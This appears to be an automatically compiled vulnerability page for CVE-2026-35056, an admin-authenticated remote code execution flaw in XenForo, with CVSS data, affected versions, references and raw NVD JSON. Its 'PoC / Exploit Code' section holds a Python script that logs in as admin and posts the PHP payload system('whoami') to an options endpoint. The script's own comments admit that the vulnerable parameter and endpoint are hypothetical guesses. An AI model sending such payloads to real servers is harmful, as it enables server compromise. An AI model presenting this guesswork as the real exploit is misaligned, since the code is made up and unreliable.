Security Vulnerability Report
CVE-2026-35056 CVSS 7.2 HIGH

CVE-2026-35056

Published: 2026-04-01 01:16:42
Last Modified: 2026-04-01 18:55:19

Description

XenForo before 2.3.9 and before 2.2.18 allows remote code execution (RCE) by authenticated, but malicious, admin users. An attacker with admin panel access can execute arbitrary code on the server.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* (XenForo < 2.2.18) - VULNERABLE
cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* (XenForo 2.3.0 to < 2.3.9) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys
import requests

# This is a conceptual Proof of Concept for CVE-2026-35056
# It demonstrates how an authenticated admin might exploit the RCE vulnerability.

TARGET_URL = "http://target-xenforo-site.com"
ADMIN_USER = "admin"
ADMIN_PASS = "password"

session = requests.Session()

# 1. Login to get admin session
login_data = {
    "login": ADMIN_USER,
    "password": ADMIN_PASS,
}
login_resp = session.post(f"{TARGET_URL}/login/login", data=login_data)
if login_resp.status_code != 200:
    print("Login failed")
    sys.exit(1)
print("Logged in successfully.")

# 2. Send payload to vulnerable admin endpoint (Hypothetical)
# Assuming the vulnerability allows code execution via a specific parameter
payload = {
    "option_value": "system('whoami');",  # Malicious PHP code
    "_xfRedirect": "/admin.php",
}
exploit_url = f"{TARGET_URL}/admin.php?options/update"
resp = session.post(exploit_url, data=payload)
if resp.status_code == 200:
    print("Payload sent. Check response for execution result.")
else:
    print("Exploit failed.")
```

References

- https://www.vulncheck.com/advisories/xenforo-remote-code-execution-via-authenticated-admin (Third Party Advisory)
- https://xenforo.com/community/threads/xenforo-2-3-9-inc-xfmg-2-2-18-released-security-fix.235659/ (Release Notes)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-35056", "sourceIdentifier": "[email protected]", "published": "2026-04-01T01:16:41.593", "lastModified": "2026-04-01T18:55:19.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XenForo before 2.3.9 and before 2.2.18 allows remote code execution (RCE) by authenticated, but malicious, admin users. An attacker with admin panel access can execute arbitrary code on the server."}, {"lang": "es", "value": "XenForo anterior a 2.3.9 y anterior a 2.2.18 permite la ejecución remota de código (RCE) por usuarios administradores autenticados, pero maliciosos. Un atacante con acceso al panel de administración puede ejecutar código arbitrario en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.18", "matchCriteriaId": "78F0F9B0-9777-4266-83FF-74BEF672AAE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.0", "versionEndExcluding": "2.3.9", "matchCriteriaId": "F317C8A1-B2B0-4C3C-AFEE-8B1050F38744"}]}]}], "references": [{"url": "https://www.vulncheck.com/advisories/xenforo-remote-code-execution-via-authenticated-admin", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://xenforo.com/community/threads/xenforo-2-3-9-inc-xfmg-2-2-18-released-security-fix.235659/", "source": "[email protected]", "tags": ["Release Notes"]}]}}
```